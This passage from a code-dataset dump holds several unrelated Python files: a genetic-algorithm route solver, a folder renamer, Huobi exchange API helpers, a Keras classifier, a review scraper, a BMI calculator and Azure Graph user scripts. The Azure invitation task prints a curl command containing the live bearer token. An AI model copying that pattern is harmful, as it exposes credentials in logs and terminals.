main()\n\n","repo_name":"davidkuda/epilot_challenge","sub_path":"src/crypto_api_client/crypto_api_client.py","file_name":"crypto_api_client.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"3419567532","text":"\"\"\"\nProject 2 - Traveling Salesman with genetic algorithm\nUses one point crossover and roulette selection of parents with a new population generational approach\nSep 20, 2023\nAuthor: Juan Lopez\nZ23635255\n\"\"\"\nimport math\n\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef create_population(size, cities_array):\n \"\"\"\n Creates a population of individuals for a genetic algorithm.\n\n Args:\n size (int): The number of individuals in the population.\n cities_array (array): the original order.\n Returns:\n list: A list of different order of x,y coordinates, different path.\n \"\"\"\n population_array = []\n\n for _ in range(size):\n # Create a copy of the shuffled array\n individual = cities_array.copy()\n # Shuffle the original array in place\n random.shuffle(individual)\n\n population_array.append(individual)\n\n return population_array\n\n\ndef calculate_fitness(population):\n fitness_scores = []\n for individual in population:\n individual_distance = calculate_individual_distance(individual)\n fitness_scores.append(individual_distance)\n\n return fitness_scores\n\n\ndef calculate_individual_distance(individual):\n \"\"\"\n Calculates the total distance of a single individual\n \"\"\"\n total_distance = 0\n for i in range(len(individual) - 1):\n distance = calculate_distance(individual[i], individual[i + 1])\n total_distance += distance\n\n return total_distance\n\n\ndef calculate_distance(point1, point2):\n # Calculate the Euclidean distance between two points\n x1, y1 = point1\n x2, y2 = point2\n return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n\n\ndef roulette_selection(population, fitness_scores):\n \"\"\"\n Selects an individual from the population using roulette wheel selection.\n\n Args:\n population (list): List of individuals in the population.\n fitness_scores (list): List of fitness scores corresponding to each individual.\n\n Returns:\n object: The selected individual.\n \"\"\"\n # Calculate the total inverted fitness score of the population\n total_fitness = sum(1.0 / score for score in fitness_scores)\n\n # Generate a random value between 0 and the total fitness score\n random_value = random.uniform(0, total_fitness)\n\n # Initialize variables for tracking the selected individual\n cumulative_fitness = 0\n selected_individual = None\n\n # Perform roulette wheel selection with inverted fitness scores\n for i in range(len(population)):\n cumulative_fitness += 1.0 / fitness_scores[i]\n if cumulative_fitness >= random_value:\n selected_individual = population[i]\n break\n\n return selected_individual\n\n\ndef one_point_crossover(parent1, parent2):\n \"\"\"\n Perform one-point crossover on two parent individuals for the Traveling Salesman Problem.\n\n Parameters:\n - parent1: The first parent individual (a list of cities).\n - parent2: The second parent individual (a list of cities).\n\n Returns:\n - offspring1: The first offspring individual (a list of cities).\n - offspring2: The second offspring individual (a list of cities).\n \"\"\"\n # Choose a random crossover point\n crossover_point = random.randint(1, min(len(parent1), len(parent2)) - 1)\n\n # Create the first offspring by taking the first part of parent1 and filling the rest from parent2\n offspring1 = parent1[:crossover_point]\n for city in parent2:\n if city not in offspring1:\n offspring1.append(city)\n\n # Create the second offspring by taking the first part of parent2 and filling the rest from parent1\n offspring2 = parent2[:crossover_point]\n for city in parent1:\n if city not in offspring2:\n offspring2.append(city)\n\n return offspring1, offspring2\n\n\ndef mutate(individual, mutation_rate):\n \"\"\"\n Mutates a tour by swapping two random cities with a certain mutation rate.\n\n Args:\n individual (list): A list representing the order of cities (points).\n mutation_rate (float): The probability of mutation for each pair of cities.\n\n Returns:\n list: A mutated tour.\n \"\"\"\n # Check if mutation should occur based on the mutation rate\n offspring = list(individual)\n if random.random() < mutation_rate:\n # Choose two distinct random indices for swapping\n idx1, idx2 = random.sample(range(len(offspring)), 2)\n\n # Swap the cities at the selected indices\n offspring[idx1], offspring[idx2] = offspring[idx2], offspring[idx1]\n\n return offspring\n\n\ndef create_new_generation(current_population, population_size):\n \"\"\"\n Generate a new population using one-point crossover, replaces the current population completely using a generational approach.\n\n Parameters:\n - current_population: The current population as a list of individuals.\n - population_size: The desired size of the new population.\n\n Returns:\n - new_population: The new population as a list of individuals.\n \"\"\"\n new_population = []\n\n while len(new_population) < population_size:\n # generate offspring by using one point crossover\n parent1 = roulette_selection(current_population, fitness)\n parent2 = roulette_selection(current_population, fitness)\n offspring1, offspring2 = one_point_crossover(parent1, parent2)\n new_population.append(offspring1)\n new_population.append(offspring2)\n\n # generate offspring by using mutation\n # parent1 = roulette_selection(current_population, fitness)\n # parent2 = roulette_selection(current_population, fitness)\n # offspring1 = mutate(parent1, 0.1)\n # offspring2 = mutate(parent2, 0.1)\n # new_population.append(offspring1)\n # new_population.append(offspring2)\n\n # If the new population size is larger than the desired size, truncate it\n if len(new_population) > population_size:\n new_population = new_population[:population_size]\n\n return new_population\n\n\ndef draw_plot(cities):\n # Create a scatter plot to visualize the random points\n plt.figure(figsize=(6, 6))\n # Extract x and y coordinates from the list of points using list comprehension\n x_coordinates = [point[0] for point in cities]\n y_coordinates = [point[1] for point in cities]\n plt.scatter(x_coordinates, y_coordinates, c='blue', marker='o', s=10)\n distance = calculate_individual_distance(cities)\n\n for i in range(len(cities) - 1):\n plt.plot([x_coordinates[i], x_coordinates[i + 1]], [y_coordinates[i], y_coordinates[i + 1]], c='red')\n\n plt.xlim(0, 200)\n plt.ylim(0, 200)\n plt.gca().invert_yaxis()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.xlabel('X-axis')\n plt.ylabel('Y-axis')\n plt.title('Randomly Generated Points ' + str(distance))\n\n\nnum_cities = 25\npopulation_size = 50\ncities = [] #[[143, 141], [82, 112], [11, 22], [81, 36], [149, 84], [23, 68], [75, 35], [184, 133], [45, 154], [78, 97]]\nnew_population = []\nrecord_distance = math.inf\nfitness = []\nbest_individual = cities\ngenerations = 100\n\n# create cities\nseed = 42\nrandom.seed(seed)\nfor _ in range(num_cities):\n x = random.randint(0, 200)\n y = random.randint(0, 200)\n cities.append([x, y])\n\n# create initial population\noriginal_population = create_population(population_size, cities)\ncurrent_population = original_population[:]\nfitness = calculate_fitness(current_population)\nfor index, value in enumerate(fitness):\n if value < record_distance:\n record_distance = value\n best_individual = current_population[index]\n\n\n# run evolution for n generations\nfor i in range(generations):\n current_population = create_new_generation(current_population, population_size)\n fitness = calculate_fitness(current_population)\n for index, value in enumerate(fitness):\n if value < record_distance:\n record_distance = value\n best_individual = current_population[index]\n\nprint(record_distance)\nprint(best_individual)\nprint(calculate_individual_distance(best_individual))\n\ndraw_plot(cities)\ndraw_plot(best_individual)\nplt.show()\n","repo_name":"juandlr/cap4630-ai","sub_path":"a2_jlopezrestre2021.py","file_name":"a2_jlopezrestre2021.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26280021505","text":"##Rename directory\n\nimport os\nimport colorama\nfrom colorama import Fore as f\n\ncolorama.init()\n\nprint(f'''\n {f.RED} ____ ______ _ __ ___ __ ___ ______\n / __ \\ / ____/ / | / / / | / |/ / / ____/ V1.00\n / /_/ / / __/ / |/ / / /| | / /|_/ / / __/ \n {f.WHITE}/ _, _/ / /___ / /| / / ___ | / / / / / /___ {os.getcwd()}\n/_/ |_| /_____/ /_/ |_/ /_/ |_| /_/ /_/ /_____/\\n''')\n\nprint(f'[*]Пример C:\\\\Users\\\\user\\\\folder\\your_folder\\\\' + ' <---------')\nprint('-' * 57)\npath = input('[!]Введите путь ------> ')\nname_of_dirs = os.listdir(path)\n\nlist_dir = []\nlist_names = []\nname_dir = ''\n\nfor i in name_of_dirs:\n if os.path.isdir(f'{path}{i}') == True:\n list_dir.append(f'{path}{i}')\n\nfor x in range(1, len(list_dir) + 1):\n name_dir = 'dir' + str(x)\n list_names.append(name_dir)\n\nfor y in range(len(list_dir)):\n os.rename(f'{list_dir[y]}',f'{path}{list_names[y]}')\n \nprint(f.GREEN + '\\n\\n[!]Папки переименованы! [OK]')\n#well3\ninput()\n\n\n","repo_name":"Zhauner/ManyProjects","sub_path":"RenameDir.py","file_name":"RenameDir.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5615807342","text":"from urllib import urlencode as _urlencode\n\nfrom huobi.constants import HUOBI_DEAL_TIMEOUT, HUOBI_GET_OPEN_ORDERS, HUOBI_API_URL, \\\n HUOBI_API_ONLY, HUOBI_GET_HEADERS\nfrom huobi.error_handling import is_error\n\n\nfrom data.trade import Trade\n\nfrom data_access.classes.post_request_details import PostRequestDetails\nfrom data_access.internet import send_get_request_with_header\n\nfrom utils.debug_utils import ERROR_LOG_FILE_NAME, print_to_console, LOG_ALL_MARKET_RELATED_CRAP, get_logging_level, \\\n LOG_ALL_DEBUG, DEBUG_LOG_FILE_NAME\n\nfrom enums.status import STATUS\n\nfrom utils.file_utils import log_to_file\nfrom utils.key_utils import sign_string_256_base64\nfrom utils.time_utils import ts_to_string_utc, get_now_seconds_utc\n\n\ndef get_open_orders_huobi_post_details(key, pair_name):\n final_url = HUOBI_API_URL + HUOBI_GET_OPEN_ORDERS + \"?\"\n\n # ('states', 'pre-submitted,submitted,partial-filled,partial-canceled'),\n\n body = [('AccessKeyId', key.api_key),\n ('SignatureMethod', 'HmacSHA256'),\n ('SignatureVersion', 2),\n ('Timestamp', ts_to_string_utc(get_now_seconds_utc(), '%Y-%m-%dT%H:%M:%S')),\n ('direct', ''),\n ('end_date', ''),\n ('from', ''),\n ('size', ''),\n ('start_date', ''),\n ('states', 'pre-submitted,submitted,partial-filled'),\n (\"symbol\", pair_name),\n ('types', '')\n ]\n\n message = _urlencode(body).encode('utf8')\n\n msg = \"GET\\n{base_url}\\n{path}\\n{msg1}\".format(base_url=HUOBI_API_ONLY, path=HUOBI_GET_OPEN_ORDERS, msg1=message)\n\n signature = sign_string_256_base64(key.secret, msg)\n\n body.append((\"Signature\", signature))\n\n final_url += _urlencode(body)\n\n params = {}\n\n res = PostRequestDetails(final_url, HUOBI_GET_HEADERS, params)\n\n if get_logging_level() >= LOG_ALL_MARKET_RELATED_CRAP:\n msg = \"get_open_orders_huobi: {res}\".format(res=res)\n print_to_console(msg, LOG_ALL_MARKET_RELATED_CRAP)\n log_to_file(msg, \"market_utils.log\")\n\n return res\n\n\ndef get_open_orders_huobi(key, pair_name):\n post_details = get_open_orders_huobi_post_details(key, pair_name)\n\n err_msg = \"get_orders_huobi\"\n\n status_code, res = send_get_request_with_header(post_details.final_url, post_details.headers, err_msg,\n timeout=HUOBI_DEAL_TIMEOUT)\n\n if get_logging_level() >= LOG_ALL_DEBUG:\n msg = \"get_open_orders_huobi: {r}\".format(r=res)\n print_to_console(msg, LOG_ALL_DEBUG)\n log_to_file(msg, DEBUG_LOG_FILE_NAME)\n\n orders = []\n if status_code == STATUS.SUCCESS:\n status_code, orders = get_orders_huobi_result_processor(res, pair_name)\n\n return status_code, orders\n\n\ndef get_orders_huobi_result_processor(json_document, pair_name):\n \"\"\"\n Used to parse result for order_history and open_orders end points\n\n :param json_document - response from exchange api as json string\n :param pair_name - for backwards capabilities\n\n :return pair of status code, result\n \"\"\"\n\n orders = []\n if is_error(json_document) or \"data\" not in json_document:\n # {u'status': u'error', u'err-code': u'invalid-symbol', u'data': None, u'err-msg': u'Invalid symbol.'}\n msg = \"get_open_orders_huobi_result_processor - error response - {er}\".format(er=json_document)\n log_to_file(msg, ERROR_LOG_FILE_NAME)\n\n return STATUS.FAILURE, orders\n\n for entry in json_document[\"data\"]:\n order = Trade.from_huobi(entry, pair_name)\n if order is not None:\n orders.append(order)\n\n return STATUS.SUCCESS, orders\n","repo_name":"kruglov-dmitry/crypto_crawler","sub_path":"huobi/order_utils.py","file_name":"order_utils.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"75"} +{"seq_id":"7266348304","text":"import keras\n\nfrom multimodal_classfiers.classifier import Classifier\n\n\nclass ClassifierMlp(Classifier):\n def build_model(self, input_shapes, nb_classes, hyperparameters):\n input_layers = []\n channel_outputs = []\n extra_dense_layers_no = 2\n dense_outputs = len(input_shapes) * [500]\n\n if hyperparameters is not None:\n extra_dense_layers_no = hyperparameters.extra_dense_layers_no\n dense_outputs = hyperparameters.dense_outputs\n\n for channel_id, input_shape in enumerate(input_shapes):\n input_layer = keras.layers.Input(input_shape)\n input_layers.append(input_layer)\n\n # flatten/reshape because when multivariate all should be on the same axis\n input_layer_flattened = keras.layers.Flatten()(input_layer)\n\n layer_1 = keras.layers.Dropout(0.1)(input_layer_flattened)\n layer = keras.layers.Dense(dense_outputs[channel_id], activation='relu')(layer_1)\n\n for i in range(extra_dense_layers_no):\n layer = keras.layers.Dropout(0.2)(layer)\n layer = keras.layers.Dense(dense_outputs[channel_id], activation='relu')(layer)\n\n output_layer = keras.layers.Dropout(0.3)(layer)\n channel_outputs.append(output_layer)\n\n flat = keras.layers.concatenate(channel_outputs, axis=-1) if len(channel_outputs) > 1 else channel_outputs[0]\n output_layer = keras.layers.Dense(nb_classes, activation='softmax')(flat)\n\n model = keras.models.Model(inputs=input_layers, outputs=output_layer)\n\n model.compile(loss='categorical_crossentropy', optimizer=self.get_optimizer(), metrics=['accuracy'])\n\n return model\n","repo_name":"aascode/dl-4-tsc","sub_path":"multimodal_classfiers/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"74692538482","text":"# https://www.acmicpc.net/problem/2309\n\nfrom itertools import combinations\n\nlst = []\nfor _ in range(9) :\n lst.append(int(input()))\ntmp = sum(lst) - 100\nfor i in combinations(lst, 2) :\n if tmp == sum(i) :\n a = i[0]\n b = i[1]\n break\nlst.remove(a)\nlst.remove(b)\nlst.sort()\nfor i in lst :\n print(i)","repo_name":"chanwoong1/Solved-Algorithm","sub_path":"baekjoon/codeplus/브루트 포스/2309_일곱난쟁이.py","file_name":"2309_일곱난쟁이.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30311376484","text":"import pandas as pd\nimport re\nfrom google_play_scraper import Sort, reviews_all\n\nall_ids = []\nreview_count = []\nreview_all = []\ncount = 0\nreview_list = []\n\ndef get_reviews(ids):\n for val in ids:\n # chanding the format of google playstore ids to the keywords for google play scraper\n\n url = val[1]\n function = val[18]\n try:\n match = re.search('id=(.*)', url)\n except Exception as inst:\n # print(inst)\n continue\n if match:\n id = match.group(1)\n else:\n print(\"No ID error\")\n continue\n # print(id)\n reviews = reviews_all(\n id,\n sleep_milliseconds=0, # defaults to 0\n lang='en', # defaults to 'en'\n country='us', # defaults to 'us'\n sort=Sort.MOST_RELEVANT, # defaults to Sort.MOST_RELEVANT\n filter_score_with= None# defaults to None(means all score)\n )\n for review in reviews:\n review_dict = {\n \"App ID\": id,\n \"Score\": review[\"score\"],\n \"Review_text\": review[\"content\"],\n \"Function\": function\n }\n review_list.append(review_dict)\n review_count.append(len(reviews))\n review_all = review_all+reviews\n\n reviews_df = pd.DataFrame(review_list)\n\n return reviews_df\n\nif __name__ == '__main__':\n\n \n input_file = 'app_details.csv' # load all the apps that we extracted from google playstore \n\n df = pd.read_csv(input_file) \n ids = df['app_id'] # for review extraction we are only using the app ids\n reviews_df = get_reviews(ids)\n reviews_df.to_csv('reviews.csv')\n\n","repo_name":"mooselab/Sports-Apps-Analysis","sub_path":"Data Collection/reviews_extraction.py","file_name":"reviews_extraction.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33825458051","text":"#find BMI and represent the table\n\nw=float(input(\"Enter your weight in kg: \"))\nh=input(\"Enter F for height entering in Foot \\nEnter M for height entering in Metre: \")\n\nif h==\"F\":\n f=float(input(\"Enter the height in foot\\n like 5.9foot: \"))\n m=f*0.3048\n print(\"your height in metere is: \",m)\n\nelif h==\"M\":\n m=float(input(\"\\nEnter the height in metre: \"))\n f=m*3.28084\n print(\"your height in foot is: \",f)\n\nelse:\n print(\"Wrong Choice!\")\n\nBMI=w/(m**2)\nprint(\"BMI is: \",BMI)\n\nif BMI < 18.5:\n print(\"\\nUNDERWEIGHT\")\n\nelif 18.5 <= BMI < 25:\n print(\"\\nNORMAL\")\n\nelif 25 <= BMI <30:\n print(\"\\nOVERWEIGHT\")\n\nelif BMI >= 30:\n print(\"\\nVERY-OVERHEIGHT\")\n\nelse :\n print(\"Wrong fied!\")\n","repo_name":"innovatorved/BasicPython","sub_path":"Data Science/w03 problem01.py","file_name":"w03 problem01.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17229981952","text":"\nimport json\nimport requests\n\nfrom datetime import datetime\nfrom invoke import task, config, call\nfrom rich.table import Table\nfrom rich.console import Console\n\nfrom gadget.tasks import init\n\nfrom azure.graphrbac import GraphRbacManagementClient\nfrom azure.common.client_factory import get_client_from_cli_profile\nfrom azure.identity import DefaultAzureCredential\nfrom azure.keyvault.secrets import SecretClient\n\n\nconsole = Console()\n\n\n@task(pre=[init.load_conf])\ndef init(ctx):\n print()\n\n\n@task(default=True, optional=['debug'])\ndef list_users(ctx, manifest=None, debug=False, role='contributor'):\n \"\"\" Initialize configuration using local* or remote project manifest file\n Parameter\n ================\n manifest: remote location for the remote project manifest file. default is None which will use local manifest if avaliable\n \"\"\"\n\n table = Table(\n \"Email\",\n \"DisplayName\",\n \"Enabled\",\n \"UserState\",\n \"Created\",\n \"LastLogin\",\n \"Type\",\n title=\"Artifacts\",\n )\n\n client = get_client_from_cli_profile(GraphRbacManagementClient)\n\n for user in client.users.list():\n # [ 'account_enabled', 'additional_properties', 'as_dict', 'deletion_timestamp', 'deserialize', 'display_name', 'enable_additional_properties_sending', 'from_dict', 'given_name', 'immutable_id', 'is_xml_model', 'mail', 'mail_nickname', 'object_id', 'object_type', 'serialize', 'sign_in_names', 'surname', 'usage_location', 'user_principal_name', 'user_type', 'validate']\n\n # console.print(dir(user))\n # console.print(user.additional_properties)\n\n input_datefmt = '%Y-%m-%dT%H:%M:%SZ'\n output_datefmt = '%b %d %Y'\n\n table.add_row(\n user.mail,\n user.display_name,\n str(user.account_enabled),\n user.as_dict().get('userState'),\n datetime.strftime(datetime.strptime(user.as_dict().get('createdDateTime'), input_datefmt), output_datefmt),\n datetime.strftime(datetime.strptime(user.as_dict().get('refreshTokensValidFromDateTime'), input_datefmt), output_datefmt),\n user.user_type,\n )\n\n console.print(table)\n\n # ucp = UserCreateParameters(\n # user_principal_name=\"catodevopsteam_capco.com#EXT#@catosaasdev.onmicrosoft.com\",\n # account_enabled=True,\n # display_name='Capco Digital Bot',\n # ##I test in my lab, if I use this line, I will get error log and could not create a user.\n # #additional_properties={\n # # \"signInNames\": [{\"type\": \"emailAddress\", \"value\": \"\"}]\n # #},\n # ##user_type only support Member or Guest, see this link https://docs.microsoft.com/en-us/python/api/azure.graphrbac.models.usercreateparameters?view=azure-python\n # user_type=\"Guest\",\n # mail_nickname = 'catodevopsteam_capco.com#EXT#',\n # password_profile=PasswordProfile(\n # password='',\n # force_change_password_next_login=False\n # )\n # )\n\n # user = client.users.create(ucp)\n\n@task\ndef add_user(ctx):\n\n params = {\n \"invitedUserDisplayName\": \"Capco Digital Bot\",\n \"invitedUserEmailAddress\": \"catodevopsteam@capco.com\",\n }\n\n #\n # Get the bearer token for authentication\n #\n client = get_client_from_cli_profile(GraphRbacManagementClient)\n token = client.objects.config.credentials.signed_session().headers.get('Authorization')\n\n my_headers = {\n 'Authorization': token,\n 'Content-Type': 'application/json'\n }\n\n r = requests.post(\n 'https://graph.microsoft.com/v1.0/invitations', \n headers=my_headers,\n json=json.dumps(params)\n )\n\n print(json.dumps(r.json(), indent=2))\n\n from requests import Request, Session\n\n s = Session()\n\n req = Request('POST', 'https://graph.microsoft.com/v1.0/invitations', json=json.dumps(params), headers=my_headers)\n prepped = req.prepare()\n\n resp = s.send(prepped)\n\n print(resp.status_code)\n\n print(f'curl -X GET -H \"Authorization: {token}\" -H \"Content-Type: application/json\" https://graph.microsoft.com/v1.0/invitations -d \\'{json.dumps(params)}\\'')\n\n\n@task()\ndef get_secret(ctx, keyvault, secret):\n credential = DefaultAzureCredential()\n\n secret_client = SecretClient(vault_url=\"https://my-key-vault.vault.azure.net/\", credential=credential)\n secret = secret_client.get_secret(\"secret-name\")\n\n print(secret.name)\n print(secret.value)\n","repo_name":"xeon22/gadget","sub_path":"gadget/tasks/azure.py","file_name":"azure.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15451959127","text":"s=int(input()) \ns1=list(map(int,input().split())) \nl1=[]\nl2=[]\nfor i in s1:\n if(i%2==0):\n l1.append(i)\n else:\n l2.append(i)\nif(len(l1)==1):\n print(*l1)\nelse:\n print(*l2)\n","repo_name":"luckysona/luckysandy","sub_path":"different number in a list.py","file_name":"different number in a list.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41478354801","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport os\nfrom os import path\nimport matplotlib\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--file\", type=str)\nparser.add_argument(\"--max\", type=float)\nparser.add_argument(\"--target\", type=int, default=-1)\nparser.add_argument(\"--text\", type=int, default=12)\n\nargs = parser.parse_args()\n\nmatplotlib.rc('xtick', labelsize=args.text) \nmatplotlib.rc('ytick', labelsize=args.text)\n\nstep = 0\n# s, b, a, s', b', empty\n\nn_size = 14\n\ntype_belief = 'actor' if 'a' in args.file else 'critic'\n\nwith open(args.file, newline='\\n') as csvfile:\n csvReader = csv.reader(csvfile)\n\n for row in csvReader:\n\n b = row[0].split(\";\")\n\n b = [float(el) for el in b]\n b = np.array(b)\n b = b.reshape(n_size + 1, n_size + 1)\n\n # belief\n plt.ylim(0, n_size)\n plt.xlim(0, n_size)\n plt.xlabel('Right bump position', fontsize=args.text + 2)\n plt.ylabel('Left bump position', fontsize=args.text + 2) \n plt.imshow(b)\n\n plt.grid()\n plt.clim(0, args.max)\n plt.colorbar()\n\n saved_path = args.file + '-' + type_belief\n\n if not path.exists(saved_path):\n os.mkdir(saved_path)\n\n if step == args.target:\n plt.savefig(saved_path + '/' + str(step) + \".png\", bbox_inches='tight', dpi=600)\n\n plt.close()\n step += 1\n\n","repo_name":"hai-h-nguyen/belief-grounded-network","sub_path":"scripts/plot_belief_recon.py","file_name":"plot_belief_recon.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"38290538018","text":"import re\n\ndata = \"day21.txt\"\npat = re.compile(r\"^([a-z\\s]+) \\(contains ([a-z,\\s]+)\\)$\")\ningredients = []\nallergen_reference = dict()\n\nfor i, line in enumerate(open(data)):\n ing, allerg = pat.match(line).groups()\n ingredients.append(ing.split())\n for al in allerg.split(\", \"):\n this_list = allergen_reference.get(al, list())\n this_list.append(i)\n allergen_reference[al] = this_list\n\nallergen_candidates = {\n key: set.intersection(*[set(ingredients[k]) for k in allergen_reference[key]])\n for key, value in allergen_reference.items()\n}\n\nno_ingredient = set(i for l in ingredients for i in l).difference(set.union(*(allergen_candidates.values())))\n\n\nprint(len([i for l in ingredients for i in l if i in no_ingredient]))","repo_name":"Kabiirk/advent-of-code-2020-entries","sub_path":"Day21/Day21.py","file_name":"Day21.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13767610245","text":"# Automatically creates SBTs for reads from given SRA study and queries them to a the given reference\n# USAGE: python create_bloom_tree.py [Study Accession Number] [0 for main drive || 1 for external drive]\nimport sys\nimport subprocess\n#import pandas as pd\nimport time\nimport datetime\nimport numpy\nimport math\nimport pdb\n\n# Start timer\nstart_time = time.time()\n\n# Set kmer size and drive to use\nkmer = str(20)\ndrive = int(sys.argv[2])\nbf_size = str(878967)\n\n# Get list of all files/directories in the mapping directory of interest\nstudy = sys.argv[1]\nif drive == 0:\n\tls = subprocess.Popen(['ls', '/home/nickeener/projects/drosophilaViruses/mapping/'+study], stdout=subprocess.PIPE)\nelse:\n\tls = subprocess.Popen(['ls', '/media/nickeener/External_Drive/'+study], stdout=subprocess.PIPE)\noutput = ls.stdout.read()\n\n# Convert output string into list containing only the SRA run accession number of each file\nreads = []\nfor i in range(len(output)):\n\tif output[i] == 'S' or output[i] == 'E' and output[i+1] == 'R':\n\t\treads.append(output[i:i+10])\n\n# Elimnate every other element from previous list (each run has a double because of forward/reverse reads)\nruns = []\nfor i in range(len(reads)):\n\tif i%2 == 1:\n\t\truns.append(reads[i])\n\n# Create bloomTree directory in correct mapping directory\nif drive == 0:\n\tnewdir = '/home/nickeener/projects/drosophilaViruses/mapping/'+study+'/bloomTrees'\nelse:\n\tnewdir = '/media/nickeener/External_Drive/'+study+'/bloomTrees'\nsubprocess.call(['mkdir', newdir])\n\n# Calculate kmer frequencies using ntcard and use to calculate appropriate bloom filter size\n'''print('ntcard --kmer='+kmer+' --threads=8 --pref='+study+' *.fastq.gz')\nsubprocess.call(['./ntcard.sh', kmer, study])\nif drive == 0:\n\tdata = pd.read_csv('/home/nickeener/projects/drosophilaViruses/mapping/'+study+'/'+study+'_k'+kmer+'.hist', header=None, sep='\\t', names=['1', '2'])\nelse:\n\tdata = pd.read_csv('/media/nickeener/External_Drive/'+study+'/'+study+'_k'+kmer+'.hist', header=None, sep='\\t', names=['1', '2'])\nbf_size = data['2'][1]-data['2'][2]\nif drive == 0:\n\tsubprocess.call(['rm', '/home/nickeener/projects/drosophilaViruses/mapping/'+study+'/'+study+'_k'+kmer+'.hist'])\nelse:\n\tsubprocess.call(['rm', '/media/nickeener/External_Drive/'+study+'/'+study+'_k'+kmer+'.hist'])\nbf_size = (bf_size+int(bf_size*.05))/1000 # Add a small portion to make a slight overstimation and divide by 1000 to get it in K format\nbf_size = str(bf_size)'''\n\n\n# For each run, call makebf to create bloom filter from each run using the bit size calculated above\n'''for run in runs:\n\tprint('~/tools/HowDeSBT/howdesbt makebf --k='+kmer+' --min=2 --bits='+bf_size+'K --threads=8 '+run+'_combined.fastq --out='+run+'.bf')\n\tsubprocess.call(['./makebf.sh', study, run, kmer, bf_size])'''\n\n# Run other howdesbt commands and query the index with the specified query\n#subprocess.call(['./cluster_build_query.sh', study, str(int(bf_size)*0.1)])\n\n# Calculate and print total run time\ntime = time.time()-start_time\nnewtime = str(datetime.timedelta(seconds=time))\n#print('Total Runtime: '+newtime)\n\n# Read output file and use regression algorithm to find average of \"empty\" (no virus) runs\n\n# Open file and remove trailing newlines\nwith open(newdir+'/queries_drosophilaViruses.dat') as file:\n\tlines = file.readlines()\nfor i in range(len(lines)):\n\tlines[i] = lines[i].rstrip()\n\n# Create a list where each element is a list with two elements, a string with the viral sequence name and a dictionary \n# with run accession numbers as keys and the corresponding kmer match proportions as their values\nmatches = []\ni = 0\ncount = 0\nwhile i < len(lines):\n\tif lines[i][0] == '*':\n\t\tmatches.append([lines[i], {}])\n\t\tj = i\n\t\tj += 1\n\t\twhile j < len(lines) and lines[j][0] != '*':\n\t\t\tj += 1\n\tfor k in range(i+1, j):\n\t\tmatches[count][1][lines[k].split()[0]] = lines[k].split()[2]\n\ti = j\n\tcount += 1\n\n# Use regression algorithm to calculate average of uninfected runs\naverages = []\nfor match in matches:\n\tvalues = []\n\tvalues.append(match[1].values())\n\tlog_values = []\n\tfor value in values[0]:\n\t\tlog_values.append(math.log10(float(value)))\n\taverages.append(numpy.mean(log_values))\n\naverage = numpy.mean(averages)\nstd = numpy.std(averages)\n\n\n\nnew_average = average + 0.001\nnew_averages = []\nwhile round(average, 5) != round(new_average, 5):\n\taverage = new_average\n\tfor avg in averages:\n\t\tif avg <= average+(2*std) and avg >= math.log10(0.05):\n\t\t\tnew_averages.append(avg)\n\taverages = new_averages\n\tnew_average = numpy.mean(averages)\n\tstd = numpy.std(averages)\n\tnew_averages = []\n\nfor average in averages:\n\tprint(average)\n","repo_name":"nickeener/drosophilaViruses","sub_path":"scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21016759516","text":"from utilities.MatplotlibUtility import *\n\n\n\nplotDescription = {\n\t'name': 'Auto Gate Sweep',\n\t'plotCategory': 'parameters',\n\t'priority': 0,\n\t'dataFileDependencies': ['disabled.json'],\n\t'plotDefaults': {\n\t\t'figsize':(2,2),\n\t\t'automaticAxisLabels':True,\n\t\t'colorDefault_Drain': ['#3F51B5'],\n\t\t'colorDefault_Gate': ['#880E7F'],\n\t\t\n\t\t'xlabel':'Time',\n\t\t'ylabel':'Voltage (V)',\n\t\t'legend_labels':['$V_{{DS}}$', '$V_{{GS}}$'],\n\t},\n}\n\ndef plot(parameters, mode_parameters=None):\n\t# Init Figure\n\tfig, ax = initFigure(1, 1, plotDescription['plotDefaults']['figsize'], figsizeOverride=mode_parameters['figureSizeOverride'])\n\n\t# Build Color Map and Color Bar\n\tcolors = [plotDescription['plotDefaults']['colorDefault_Drain'][0], plotDescription['plotDefaults']['colorDefault_Gate'][0]]\n\t\n\tstart = parameters['runConfigs']['GateSweep']['gateVoltageMinimum']\n\tend = parameters['runConfigs']['GateSweep']['gateVoltageMaximum']\n\tpoints = parameters['runConfigs']['GateSweep']['stepsInVGSPerDirection']\n\tduplicates = parameters['runConfigs']['GateSweep']['pointsPerVGS']\n\tramps = 